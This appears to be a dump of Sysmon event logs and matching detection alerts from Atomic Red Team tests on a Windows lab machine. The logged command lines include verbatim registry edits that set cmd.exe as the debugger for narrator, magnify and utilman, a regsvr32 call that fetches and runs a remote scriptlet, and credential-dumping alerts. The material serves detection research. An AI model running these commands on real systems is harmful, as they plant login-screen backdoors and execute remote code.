+
+
+ 3748
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:14.762
+ 747F3D96-D8A6-5D31-0000-0010F9B13200
+ 6664
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547814.692289,2019-07-19T18:50:14.692289+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3745
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:14.649
+ 747F3D96-D8A6-5D31-0000-001053A73200
+ 6888
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547814.678185,2019-07-19T18:50:14.678185+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3744
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:13.173
+ 747F3D96-D8A5-5D31-0000-0010C0A03200
+ 6116
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547813.127595,2019-07-19T18:50:13.127595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3741
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:13.096
+ 747F3D96-D8A5-5D31-0000-0010729B3200
+ 4212
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547813.109148,2019-07-19T18:50:13.109148+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3740
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:10.306
+ 747F3D96-D8A2-5D31-0000-0010D8943200
+ 2484
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547810.282757,2019-07-19T18:50:10.282757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3737
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:10.253
+ 747F3D96-D8A2-5D31-0000-00108A8F3200
+ 6156
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547810.26663,2019-07-19T18:50:10.266630+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3736
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:07.335
+ 747F3D96-D89F-5D31-0000-0010BC823200
+ 2404
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1003 ] Credential Dumping ImageLoad,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 1103
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ DESKTOP-NTSSLJD
+
+
+
+
+ -
+ 2020-10-20 11:51:09.588
+ 23F38D93-CEB4-5F8E-9F08-000000000C00
+ 9392
+ C:\Windows\System32\mmc.exe
+ C:\Windows\System32\samlib.dll
+ 10.0.18362.1049 (WinBuild.160101.0800)
+ SAM Library DLL
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SAMLib.DLL
+ SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B
+ true
+ Microsoft Windows
+ Valid
+
+",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 1103
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ DESKTOP-NTSSLJD
+
+
+
+
+ -
+ 2020-10-20 11:51:09.588
+ 23F38D93-CEB4-5F8E-9F08-000000000C00
+ 9392
+ C:\Windows\System32\mmc.exe
+ C:\Windows\System32\samlib.dll
+ 10.0.18362.1049 (WinBuild.160101.0800)
+ SAM Library DLL
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SAMLib.DLL
+ SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B
+ true
+ Microsoft Windows
+ Valid
+
+",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548027.083068,2019-07-19T18:53:47.083068+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4046
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:46.938
+ 747F3D96-D97A-5D31-0000-00102BE33800
+ 4628
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4045
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:46.867
+ 747F3D96-D97A-5D31-0000-001019DE3800
+ 5828
+ C:\Windows\System32\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4045
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:46.867
+ 747F3D96-D97A-5D31-0000-001019DE3800
+ 5828
+ C:\Windows\System32\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4045
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:46.867
+ 747F3D96-D97A-5D31-0000-001019DE3800
+ 5828
+ C:\Windows\System32\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4044
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:46.831
+ 747F3D96-D97A-5D31-0000-00109DDC3800
+ 3564
+ C:\Windows\SysWOW64\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4044
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:46.831
+ 747F3D96-D97A-5D31-0000-00109DDC3800
+ 3564
+ C:\Windows\SysWOW64\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4044
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:46.831
+ 747F3D96-D97A-5D31-0000-00109DDC3800
+ 3564
+ C:\Windows\SysWOW64\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1563548026.848703,2019-07-19T18:53:46.848703+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 4043
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Suspicious NetCon
+ 2019-07-19 14:53:40.896
+ 747F3D96-D978-5D31-0000-0010EB313800
+ 2076
+ C:\Windows\System32\regsvr32.exe
+ MSEDGEWIN10\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ MSEDGEWIN10.home
+ 49728
+
+ false
+ 151.101.0.133
+
+ 443
+ https
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548026.589404,2019-07-19T18:53:46.589404+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4042
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:46.405
+ 747F3D96-D97A-5D31-0000-001089BD3800
+ 7148
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1563548026.565529,2019-07-19T18:53:46.565529+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4041
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:46.135
+ 747F3D96-D97A-5D31-0000-00105DA83800
+ 4336
+ C:\Windows\System32\calc.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Calculator
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\calc.exe"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729
+ 747F3D96-D978-5D31-0000-0010EB313800
+ 2076
+ C:\Windows\System32\regsvr32.exe
+ regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4038
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:44.049
+ 747F3D96-D978-5D31-0000-0010EB313800
+ 2076
+ C:\Windows\System32\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
+ 747F3D96-D978-5D31-0000-0010442F3800
+ 2832
+ C:\Windows\System32\cmd.exe
